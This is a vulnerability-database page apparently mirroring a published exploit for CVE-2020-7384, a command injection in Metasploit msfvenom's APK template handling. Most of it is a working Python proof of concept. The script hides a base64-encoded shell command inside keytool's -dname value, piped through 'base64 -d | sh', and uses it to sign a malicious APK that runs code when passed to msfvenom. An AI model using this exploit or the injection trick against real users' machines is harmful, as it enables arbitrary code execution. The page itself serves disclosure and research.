Vulners
Lucene search
Metasploit Framework 6.0.11 Command Injection
🗓️ 29 Jan 2021 00:00:00Reported by Justin StevenType 
packetstorm🔗 packetstormsecurity.com👁 260 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Rapid7 Metasploit Framework msfvenom APK Template Command Injection Exploit | 10 Nov 202000:00 | – | zdt |
| Metasploit Framework 6.0.11 - msfvenom APK template command injection Exploit | 28 Jan 202100:00 | – | zdt |
 | Exploit for Command Injection in Rapid7 Metasploit | 7 Feb 202116:00 | – | githubexploit |
 | CVE-2020-7384 | 10 Nov 202009:46 | – | circl |
 | CVE-2020-7384 | 29 Oct 202014:05 | – | cve |
 | CVE-2020-7384 Client-Side Command Injection in Rapid7 Metasploit | 29 Oct 202014:05 | – | cvelist |
 | Metasploit Framework 6.0.11 - msfvenom APK template command injection | 28 Jan 202100:00 | – | exploitdb |
 | Rapid7 Metasploit Framework msfvenom APK Template Command Injection | 10 Nov 202017:41 | – | metasploit |
 | CVE-2020-7384 | 29 Oct 202015:15 | – | nvd |
| Rapid7 Metasploit Framework msfvenom APK Template Command Injection | 10 Nov 202000:00 | – | packetstorm |
10
`# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'
# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()
tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"
# Touch empty_file
open(empty_file, "w").close()
# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])
# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2021 00:00Current
7.2High risk
Vulners AI Score7.2
EPSS0.7009